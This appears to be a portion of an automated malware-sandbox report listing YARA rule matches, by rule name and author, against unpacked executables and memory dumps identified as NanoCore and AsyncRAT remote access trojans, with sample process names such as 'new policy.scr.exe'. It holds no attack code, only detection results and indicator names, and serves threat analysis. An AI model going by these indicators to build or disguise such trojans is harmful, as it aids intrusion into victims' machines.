Source: 3.2.new policy.scr.exe.7720000.14.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.7720000.14.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.7720000.14.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 8.2.Networks!.exe.37445bd.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 8.2.Networks!.exe.37445bd.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 8.2.Networks!.exe.37445bd.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 0.2.new policy.scr.exe.3252f80.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 3.2.new policy.scr.exe.7770000.17.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.7770000.17.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.7770000.17.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 8.2.Networks!.exe.373b15e.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 8.2.Networks!.exe.373b15e.7.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 8.2.Networks!.exe.373b15e.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 8.2.Networks!.exe.373b15e.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.77a0000.19.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.77a0000.19.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.77a0000.19.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 0.2.new policy.scr.exe.42c7788.8.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0.2.new policy.scr.exe.42c7788.8.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.2.new policy.scr.exe.42c7788.8.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.new policy.scr.exe.42c7788.8.unpack, type: UNPACKEDPE	Matched rule: detect Nanocore in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.new policy.scr.exe.42c7788.8.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.4550e57.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.4550e57.7.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 3.2.new policy.scr.exe.4550e57.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.4550e57.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 8.2.Networks!.exe.700000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 8.2.Networks!.exe.700000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 8.2.Networks!.exe.700000.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 8.2.Networks!.exe.700000.0.unpack, type: UNPACKEDPE	Matched rule: detect Nanocore in memory Author: JPCERT/CC Incident Response Group
Source: 8.2.Networks!.exe.700000.0.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.44f2776.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.44f2776.4.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.44f2776.4.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.7790000.18.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.7790000.18.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.7790000.18.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.77d0000.21.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.77d0000.21.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.77d0000.21.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.7730000.15.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.7730000.15.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.7730000.15.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 2.0.airlineagancy.casacam.net 7076.exe.280000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 3.2.new policy.scr.exe.5980000.10.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.5980000.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.5980000.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 0.2.new policy.scr.exe.3252f80.1.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 8.2.Networks!.exe.373ff94.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 8.2.Networks!.exe.373ff94.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 8.2.Networks!.exe.373ff94.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.43f7444.9.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.43f7444.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.43f7444.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.44f2776.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.44f2776.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 3.2.new policy.scr.exe.44f2776.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.44f2776.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.328f8ec.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.328f8ec.2.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.328f8ec.2.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.77b0000.20.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.77b0000.20.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.77b0000.20.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.7720000.14.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.7720000.14.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.7720000.14.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 8.2.Networks!.exe.275a4e8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 8.2.Networks!.exe.275a4e8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 8.2.Networks!.exe.275a4e8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.7930000.23.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.7930000.23.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.7930000.23.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.4559c86.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.4559c86.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.4559c86.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.7730000.15.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.7730000.15.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.7730000.15.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.7980000.27.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.7980000.27.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.7980000.27.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.3289e68.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.3289e68.1.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.3289e68.1.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.3289e68.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.3289e68.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 3.2.new policy.scr.exe.3289e68.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.3289e68.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.59e0000.12.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.59e0000.12.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.59e0000.12.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.7770000.17.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.7770000.17.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.7770000.17.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 6.2.Networks!.exe.60b5958.13.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 6.2.Networks!.exe.60b5958.13.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 6.2.Networks!.exe.60b5958.13.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 6.2.Networks!.exe.60b5958.13.raw.unpack, type: UNPACKEDPE	Matched rule: detect Nanocore in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.Networks!.exe.60b5958.13.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.7950000.25.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.7950000.25.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.7950000.25.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 0.2.new policy.scr.exe.42c7788.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0.2.new policy.scr.exe.42c7788.8.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.2.new policy.scr.exe.42c7788.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.new policy.scr.exe.42c7788.8.raw.unpack, type: UNPACKEDPE	Matched rule: detect Nanocore in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.new policy.scr.exe.42c7788.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.77d0000.21.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.77d0000.21.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.77d0000.21.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.7950000.25.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.7950000.25.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.7950000.25.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.4405860.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.4405860.6.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.4405860.6.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 8.2.Networks!.exe.373ff94.8.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 8.2.Networks!.exe.373ff94.8.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 8.2.Networks!.exe.373ff94.8.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.7980000.27.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.7980000.27.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.7980000.27.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.7760000.16.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.7760000.16.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.7760000.16.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.43f7444.9.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.43f7444.9.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.43f7444.9.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.4550e57.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.4550e57.7.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.4550e57.7.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.795e8a4.26.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.795e8a4.26.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.795e8a4.26.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.4559c86.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.4559c86.3.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.4559c86.3.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.4405860.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.4405860.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.4405860.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.7954c9f.24.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.7954c9f.24.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.7954c9f.24.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 6.2.Networks!.exe.60b5958.13.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 6.2.Networks!.exe.60b5958.13.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 6.2.Networks!.exe.60b5958.13.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 6.2.Networks!.exe.60b5958.13.unpack, type: UNPACKEDPE	Matched rule: detect Nanocore in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.Networks!.exe.60b5958.13.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.328f8ec.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.328f8ec.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 3.2.new policy.scr.exe.328f8ec.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.328f8ec.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.3255830.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.3255830.0.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 3.2.new policy.scr.exe.3255830.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.3255830.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 00000003.00000002.2867271024.0000000007760000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000003.00000002.2867271024.0000000007760000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000003.00000002.2867271024.0000000007760000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 00000003.00000002.2867912424.00000000077B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000003.00000002.2867912424.00000000077B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000003.00000002.2867912424.00000000077B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 00000006.00000002.2239294193.0000000006173000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000006.00000002.2239294193.0000000006173000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000006.00000002.2239294193.0000000006173000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Nanocore in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.2852023359.00000000044EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000003.00000002.2852023359.00000000044EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000000.00000002.1877031081.000000000428C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000000.00000002.1877031081.000000000428C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000000.00000002.1877031081.000000000428C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Nanocore in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.2868662775.0000000007920000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000003.00000002.2868662775.0000000007920000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000003.00000002.2868662775.0000000007920000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 00000003.00000002.2866783271.0000000007720000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000003.00000002.2866783271.0000000007720000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000003.00000002.2866783271.0000000007720000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 00000003.00000002.2858338720.0000000005980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000003.00000002.2858338720.0000000005980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000003.00000002.2858338720.0000000005980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 00000003.00000002.2869659382.0000000007930000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000003.00000002.2869659382.0000000007930000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000003.00000002.2869659382.0000000007930000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 00000006.00000002.2239294193.000000000607A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000006.00000002.2239294193.000000000607A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000006.00000002.2239294193.000000000607A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Nanocore in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.2866874996.0000000007730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000003.00000002.2866874996.0000000007730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000003.00000002.2866874996.0000000007730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 00000002.00000000.1859765201.0000000000282000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000007.00000002.2327789577.0000000005D23000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000007.00000002.2327789577.0000000005D23000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000007.00000002.2327789577.0000000005D23000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Nanocore in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.2852023359.00000000043F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000000.00000002.1869683888.000000000322A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000003.00000002.2868258629.00000000077D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
